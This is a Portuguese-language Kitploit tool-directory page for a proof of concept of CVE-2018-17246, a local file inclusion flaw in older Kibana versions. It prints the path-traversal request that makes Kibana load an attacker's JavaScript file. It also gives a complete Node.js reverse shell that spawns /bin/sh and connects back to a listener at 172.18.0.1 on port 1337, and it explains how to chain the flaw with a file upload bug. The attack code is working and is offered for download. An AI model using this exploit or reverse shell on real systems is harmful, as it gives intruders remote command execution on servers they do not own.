Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-17246 — CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13 | Kitploit
Ferramentas/GitHubGitHub/mpgn/cve-2018-17246
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingRed TeamingPayload Development
GitHubmpgn/cve-2018-17246

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Ver Repositório
6515há 6 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-17246 - LFI do Kibana < 6.4.3 e 5.6.13

Uma Inclusão de Arquivo Local no Kibana descoberta pela CyberArk Labs, o LFI pode ser usado para executar um reverse shell no servidor Kibana com o seguinte payload:

root@kitploit:~
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

Como você já deve ter adivinhado, este ataque precisa ser combinado com um upload de arquivo irrestrito ou qualquer outra vulnerabilidade que permita escrever um arquivo no servidor.

Não há validação de entrada, então podemos alterar o nome do arquivo JavaScript para qualquer coisa que quisermos. Neste caso, com a técnica de path traversal, podemos escolher qualquer arquivo no servidor Kibana. Uma coisa para se estar ciente, no entanto, é o recurso de cache de módulo do node. Essencialmente, como o LFI funciona enviando entrada de usuário não sanitizada para a função require do node, o módulo incluído (o payload do atacante) será armazenado em cache por nome de arquivo. Isso significa que você não pode enviar o mesmo payload para, por exemplo, recuperar um reverse shell.

lfi

Detalhes da vulnerabilidade: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/

Aviso de segurança: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


  • versão 6.0.0 do kibana do docker (sem nenhum ElasticSearch vinculado, o PoC está funcionando)
  • shell.js de https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell
root@kitploit:~
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
Baixar ferramenta